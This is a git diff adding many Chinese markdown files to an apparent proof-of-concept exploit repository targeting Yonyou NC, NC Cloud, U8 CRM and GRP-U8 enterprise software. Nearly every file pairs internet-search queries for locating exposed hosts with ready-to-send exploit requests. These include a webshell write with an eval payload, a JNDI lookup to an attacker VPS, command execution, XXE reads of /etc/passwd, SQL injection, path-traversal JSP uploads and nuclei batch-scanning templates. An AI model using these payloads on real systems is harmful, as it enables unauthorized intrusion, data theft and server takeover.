+![](https://mmbiz.qpic.cn/sz_mmbiz_png/Lc4ILVKo1g8Fcvju7pia1Lgsn9t5LBBrZibkYPnsDqIIA3LNhWdFso2I2DMibJJ4DQZbvCibWlRJJqfeib7ZiafvQiceA/640?wx_fmt=png&wxfrom=13)
diff --git a/用友-NC-Cloud-jsinvoke-任意文件上传漏洞.md b/用友-NC-Cloud-jsinvoke-任意文件上传漏洞.md
new file mode 100644
index 0000000..db673c1
--- /dev/null
+++ b/用友-NC-Cloud-jsinvoke-任意文件上传漏洞.md
@@ -0,0 +1,63 @@
+## 用友 NC Cloud jsinvoke 任意文件上传漏洞
+漏洞描述
+用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限
+app="用友-NC-Cloud"
+
+## 写入webshell
+```
+POST /uapjs/jsinvoke/?action=invoke
+Content-Type: application/json
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
+    "webapps/nc_web/407.jsp"
+  ]
+}
+
+POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
+Host:
+Connection: Keep-Alive
+Content-Length: 253
+Content-Type: application/x-www-form-urlencoded
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}",
+    "webapps/nc_web/301.jsp"
+  ]
+}
+
+```
+
+## 执行命令
+```
+
+POST /407.jsp?error=bsh.Interpreter HTTP/1.1
+Host: *
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close    
+Cookie: JSESSIONID=80DA93FB2FFF0204E78FA82643D5BC6E
+If-Modified-Since: Fri, 09 Dec 2022 16:12:59 GMT
+If-None-Match: W/"370397-1670602379000"
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+           
+cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
+```
+
diff --git a/用友-NC-uapws-wsdl-XXE漏洞.md b/用友-NC-uapws-wsdl-XXE漏洞.md
new file mode 100644
index 0000000..0657176
--- /dev/null
+++ b/用友-NC-uapws-wsdl-XXE漏洞.md
@@ -0,0 +1,40 @@
+## 用友 NC uapws wsdl XXE漏洞
+用友 NC uapws wsdl 存在XXE漏洞
+
+## fofa
+```
+app="用友-UFIDA-NC"
+```
+
+## poc
+```
+http://x.x.x.x/uapws/service/nc.uap.oba.update.IUpdateService?wsdl
+
+GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/test.xml HTTP/1.1
+Host:
+Pragma: no-cache
+Cache-Control: no-cache
+Accept: text/plain, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/d11cc7e3-b0d2-484d-9911-ca742cc384d5)
+
+![image](https://github.com/wy876/POC/assets/139549762/7a77f089-7a6e-49e4-965b-59ebe9fe23fb)
+
+## xxe读取文件
+任意文件读取利用，需要VPS上建立对应操作系统的xml文件，然后开启http服务。xml文件如下
+
+```
+windows:
+<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]><user><username>&name;</username><password>1</password></user>
+
+linux:
+evil.xml:
+<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///etc/passwd">]><user><username>&name;</username><password>1</password></user>
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/dfbf0584-9fa5-45ea-92d0-0e13160d4bf0)
+
+![image](https://github.com/wy876/POC/assets/139549762/c218c1dd-e73b-42b5-bbce-f96da6efbb08)
+
diff --git a/用友CRM-任意文件读取漏洞.md b/用友CRM-任意文件读取漏洞.md
new file mode 100644
index 0000000..7eef94c
--- /dev/null
+++ b/用友CRM-任意文件读取漏洞.md
@@ -0,0 +1,12 @@
+## 用友CRM 任意文件读取漏洞
+
+## hunter
+```
+app.name="用友 CRM"
+```
+
+## poc
+```
+http://127.0.0.1:9000/pub/help2.php?key=../../apache/php.ini
+```
+![image](https://github.com/wy876/POC/assets/139549762/419deef4-d49f-4fe2-aa80-0c6b93174f58)
diff --git a/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md b/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md
new file mode 100644
index 0000000..d324cd3
--- /dev/null
+++ b/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md
@@ -0,0 +1,50 @@
+## 用友CRM系统存在逻辑漏洞直接登录后台
+
+## 鹰图
+```
+app.name="用友 CRM"
+```
+
+## poc
+```
+/background/reservationcomplete.php?ID=1
+```
+
+访问poc，页面返回空白
+![image](https://github.com/wy876/wiki/assets/139549762/75b9ae1d-43b2-4996-a1c9-a9d8bf50d388)
+
+直接就访问主要就登录后台了
+![image](https://github.com/wy876/wiki/assets/139549762/9381b9d2-3f2f-4007-bab7-56d62d7c6e81)
+
+![image](https://github.com/wy876/wiki/assets/139549762/6d6076b2-905d-4afe-8388-4ee532fd348a)
+
+
+## nuclei
+```
+id: yongyouU8_CRM-reservationcomplete
+info:
+  name: 用友CRM系统存在逻辑漏洞直接登录后台
+  author: wy876
+  severity: high
+
+http:
+  - raw:
+      - |
+        GET /background/reservationcomplete.php?ID=1 HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+        
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'
+```
diff --git a/用友GRP-U8系统taskmanager_login存在SQL注入漏洞.md b/用友GRP-U8系统taskmanager_login存在SQL注入漏洞.md
new file mode 100644
index 0000000..3cf4203
--- /dev/null
+++ b/用友GRP-U8系统taskmanager_login存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# 用友GRP-U8系统taskmanager_login存在SQL注入漏洞
+
+用友GRP-U8系统taskmanager_login存在SQL注入漏洞
+
+## fofa
+
+```javascript
+app="用友-GRP-U8"
+```
+
+## poc
+
+```javascript
+POST /TaskManager/taskmanager_login HTTP/1.1
+Host: 192.168.57.141:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: JSESSIONID=6D291F1355C003C0237B76758924D087
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+Content-Length: 94
+
+UserNameText=%CF%B5%CD%B3%B9%DC%C0%ED%D4%B1&UserPassText=abc&LoginType=;WAITFOR DELAY '0:0:5'--&submitAction=login
+```
+
diff --git a/用友NC-Cloud-uploadChunk-任意文件上传漏洞.md b/用友NC-Cloud-uploadChunk-任意文件上传漏洞.md
new file mode 100644
index 0000000..06894dc
--- /dev/null
+++ b/用友NC-Cloud-uploadChunk-任意文件上传漏洞.md
@@ -0,0 +1,67 @@
+## 用友NC-Cloud uploadChunk 任意文件上传漏洞
+
+## fofa
+```
+app="用友-NC-Cloud"
+```
+
+
+## POC
+
+```
+POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
+Host: {{Hostname}}
+Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
+
+--024ff46f71634a1c9bf8ec5820c26fa9--
+Content-Disposition: form-data; name="file"; filename="test.txt"
+
+1123213
+--024ff46f71634a1c9bf8ec5820c26fa9--
+
+```
+
+文件上传路径访问
+/nccloud/test.txt
+
+## nuclei批量yaml文件
+```yaml
+id: yonyou_NCCloud_uploadChunk_upload
+
+info:
+  name: 用友NC Cloud uploadChunk任意文件上传漏洞
+  author: afan
+  severity: critical
+  tags: yonyou,changjietong,bjxsec,yonyouoa
+  description: fofa   app="畅捷通-TPlus"
+variables:
+  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
+  file_content: "{{to_lower(rand_text_alpha(26))}}"
+requests:
+  - raw:
+      - |
+        POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
+        accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+        Content-Length: 153
+
+        --024ff46f71634a1c9bf8ec5820c26fa9
+        Content-Disposition: form-data; name="file"; filename="{{file_name}}"
+
+        {{file_content}}
+        --024ff46f71634a1c9bf8ec5820c26fa9--
+      
+      - |
+        GET /nccloud/{{file_name}} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers:
+      - type: word
+        words:
+          - "{{file_content}}"
+        part: body
+
+
+```
diff --git a/用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞.md b/用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞.md
new file mode 100644
index 0000000..2a1d758
--- /dev/null
+++ b/用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞.md
@@ -0,0 +1,26 @@
+## 用友NC-Cloud接口blobRefClassSearch存在反序列化漏洞
+
+用友NC Cloud接口 /ncchr/pm/ref/indiIssued/blobRefClassSearch 存在反序列漏洞。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+```yaml
+POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
+Content-Type: application/json
+Host: 
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+
+{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}}"}
+```
+
diff --git a/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md b/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md
new file mode 100644
index 0000000..f61e2a6
--- /dev/null
+++ b/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 用友NC-Cloud系统show_download_content接口存在SQL注入漏洞
+
+用友NC-Cloud系统show_download_content接口存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+```javascript
+GET /ebvp/infopub/show_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: zh-CN
+Connection: keep-alive
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409031847062.png)
\ No newline at end of file
diff --git a/用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞.md b/用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞.md
new file mode 100644
index 0000000..81a4700
--- /dev/null
+++ b/用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 用友NC-Cloud系统接口getStaffInfo存在SQL注入漏洞
+
+用友NC-Cloud系统getStaffInfo接口存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+```javascript
+app="用友-NC-Cloud"
+```
+
+## poc
+```javascript
+GET /ncchr/attendstaff/getStaffInfo?id=1%27%29+AND+2787%3D%28SELECT+UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%282787%3D2787%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29+FROM+DUAL%29--+gPZR HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241219152316693](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191523762.png)
diff --git a/用友NC-cartabletimeline存在SQL注入漏洞.md b/用友NC-cartabletimeline存在SQL注入漏洞.md
new file mode 100644
index 0000000..bcf948c
--- /dev/null
+++ b/用友NC-cartabletimeline存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# 用友NC-cartabletimeline存在SQL注入漏洞
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```javascript
+GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:2%27--+ HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Priority: u=4
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280915472.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/627
diff --git a/用友NC-process存在SQL注入漏洞.md b/用友NC-process存在SQL注入漏洞.md
new file mode 100644
index 0000000..7285bb0
--- /dev/null
+++ b/用友NC-process存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 用友NC-process存在SQL注入漏洞
+
+用友NC /portal/pt/task/process 接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
+
+## fofa
+
+```javascript
+icon_hash="1085941792"
+```
+
+
+## poc
+
+```javascript
+POST /portal/pt/task/process?pageId=login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+id=1&oracle=1&pluginid=1%27%20AND%207194%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287194%3D7194%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20dJyN
+```
+
+![image-20241128091833680](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280918769.png)
diff --git a/用友NC-word.docx任意文件读取漏洞.md b/用友NC-word.docx任意文件读取漏洞.md
new file mode 100644
index 0000000..ee8d51c
--- /dev/null
+++ b/用友NC-word.docx任意文件读取漏洞.md
@@ -0,0 +1,20 @@
+
+## 用友NC word.docx任意文件读取漏洞
+
+## fofa
+```
+body="UClient.dmg"
+```
+
+## poc
+```
+GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+
+```
+
+## 漏洞复现
+![0152cd5a2d208fb2e336de5ac3621ebb](https://github.com/wy876/POC/assets/139549762/05dcd3bf-a6ae-4aac-95ca-e6788e2eadb0)
diff --git a/用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013).md b/用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013).md
new file mode 100644
index 0000000..4bb0d79
--- /dev/null
+++ b/用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013).md
@@ -0,0 +1,30 @@
+# 用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013)
+
+用友NC中checkekey存在SQL注入漏洞，攻击者可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```javascript
+POST /portal/pt/office/checkekey?pageId=login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+user=1' UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(112)||CHR(122)||CHR(113)||CHR(80)||CHR(103)||CHR(106)||CHR(122)||CHR(81)||CHR(70)||CHR(74)||CHR(104)||CHR(106)||CHR(107)||CHR(100)||CHR(74)||CHR(105)||CHR(114)||CHR(88)||CHR(73)||CHR(112)||CHR(81)||CHR(101)||CHR(119)||CHR(116)||CHR(79)||CHR(71)||CHR(78)||CHR(115)||CHR(65)||CHR(111)||CHR(70)||CHR(103)||CHR(85)||CHR(71)||CHR(83)||CHR(101)||CHR(65)||CHR(71)||CHR(90)||CHR(114)||CHR(87)||CHR(78)||CHR(107)||CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- twnX&ekey=1
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501122254942.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486717&idx=1&sn=09d465455794e1d55e13f2b10565a7ab
\ No newline at end of file
diff --git a/用友NC接口download存在SQL注入漏洞.md b/用友NC接口download存在SQL注入漏洞.md
new file mode 100644
index 0000000..6a30e88
--- /dev/null
+++ b/用友NC接口download存在SQL注入漏洞.md
@@ -0,0 +1,15 @@
+# 用友NC接口download存在SQL注入漏洞
+
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```java
+http://ip/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ
+```
+
diff --git a/用友NC系统FileManager接口存在任意文件上传漏洞.md b/用友NC系统FileManager接口存在任意文件上传漏洞.md
new file mode 100644
index 0000000..b4404b5
--- /dev/null
+++ b/用友NC系统FileManager接口存在任意文件上传漏洞.md
@@ -0,0 +1,25 @@
+# 用友NC系统FileManager接口存在任意文件上传漏洞
+
+NC系统可利用/portal/pt/file/upload 接口中的 filename 参数及 billitem 参数实现任意文件上传，从而控制服务器
+
+## fofa
+
+```yaml
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```java
+POST /portal/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C HTTP/1.1
+Host:
+Content-Type: multipart/form-data;boundary=d0b7a0d40eed0e32904c8017b09eb305
+
+--d0b7a0d40eed0e32904c8017b09eb305
+Content-Disposition: form-data; name="file"; filename="we.jsp" 
+Content-Type: text/plain
+
+<%out.print("hello world");%>
+--d0b7a0d40eed0e32904c8017b09eb305--
+```
+
diff --git a/用友NC系统word.docx存在信息泄露漏洞.md b/用友NC系统word.docx存在信息泄露漏洞.md
new file mode 100644
index 0000000..7708d8c
--- /dev/null
+++ b/用友NC系统word.docx存在信息泄露漏洞.md
@@ -0,0 +1,28 @@
+# 用友NC系统word.docx存在信息泄露漏洞
+
+用友NC系统word.docx存在信息泄露漏洞
+
+## fofa
+
+```javascript
+app="用友-UFIDA-NC"
+```
+
+## poc
+
+```javascript
+GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Cookie: JSESSIONID=722CE6F799BBDE1ED1AFA8DC032B06C0.ncServer; JSESSIONID=6BDD75C8E88EE19ED89FF84865C74059.ncServer
+Host: 
+If-Modified-Since: Mon, 07 Jan 2019 01:42:44 GMT
+If-None-Match: W/"15737-1546825364907"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+```
+
+![image-20241017142208558](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410171422653.png)
\ No newline at end of file
diff --git a/用友NC系统接口yerfile_down存在SQL注入漏洞.md b/用友NC系统接口yerfile_down存在SQL注入漏洞.md
new file mode 100644
index 0000000..0b59573
--- /dev/null
+++ b/用友NC系统接口yerfile_down存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 用友NC系统接口yerfile_down存在SQL注入漏洞
+用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。 用友NC yerfile存在SQL注入漏洞
+
+## fofa
+
+```javascript
+app="用友-UFIDA-NC"
+```
+
+### 四、漏洞复现
+```javascript
+POST /portal/pt/yerfile/down/bill?pageId=login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),6)--
+```
+
+
+
diff --git a/用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md b/用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..72af90f
--- /dev/null
+++ b/用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# 用友U8+CRM系统leadconversion.php存在SQL注入漏洞
+
+用友U8+CRM系统leadconversion.php存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## fofa
+
+```javascript
+title="用友U8CRM"
+```
+
+## hunter
+
+```javascript
+app.name="用友 CRM"
+```
+
+## poc
+
+```javascript
+POST /lead/leadconversion.php HTTP/1.1
+Upgrade-Insecure-Requests: 1
+Cookie: PHPSESSID=bgsesstimeout-;
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 75
+
+DontCheckLogin=1&Action=getDeptName&userid=1%27;WAITFOR+DELAY+%270:0:5%27--
+```
+
diff --git a/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md b/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..f6b89da
--- /dev/null
+++ b/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 用友U8-CRM接口exportdictionary.php存在SQL注入漏洞
+
+用友U8-CRM接口 /devtools/tools/exportdictionary.ph p存在SQL注入漏洞
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## poc
+
+```java
+GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-; TL_EXPANDED=REL_STAGE2012
+```
+
diff --git a/用友U8-CRM接口rellistname.php存在SQL注入漏洞.md b/用友U8-CRM接口rellistname.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..3a462c9
--- /dev/null
+++ b/用友U8-CRM接口rellistname.php存在SQL注入漏洞.md
@@ -0,0 +1,19 @@
+# 用友U8-CRM接口rellistname.php存在SQL注入漏洞
+
+用友U8+CRM    /config/rellistname.php 文件多个方法存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句。
+
+## fofa
+
+```javascript
+body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM"
+```
+
+## poc
+
+```javascript
+GET /config/rellistname.php?DontCheckLogin=1&objType=1&reportID=1+wAiTFOR+DeLAy'0:0:4'--+- HTTP/1.1
+Host: 
+Cookie: PHPSESSID=bgsesstimeout-;
+```
+
+![image-20241206230326146](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062303231.png)
\ No newline at end of file
diff --git a/用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞.md b/用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..73a0805
--- /dev/null
+++ b/用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞.md
@@ -0,0 +1,77 @@
+# 用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞
+
+用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞，文件多个方法存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## hunter
+
+```jade
+app.name="用友 CRM"
+```
+
+## fofa
+
+```jade
+title="用友U8CRM"
+```
+
+## poc
+
+```javascript
+POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getWarehouseOtherInfo HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
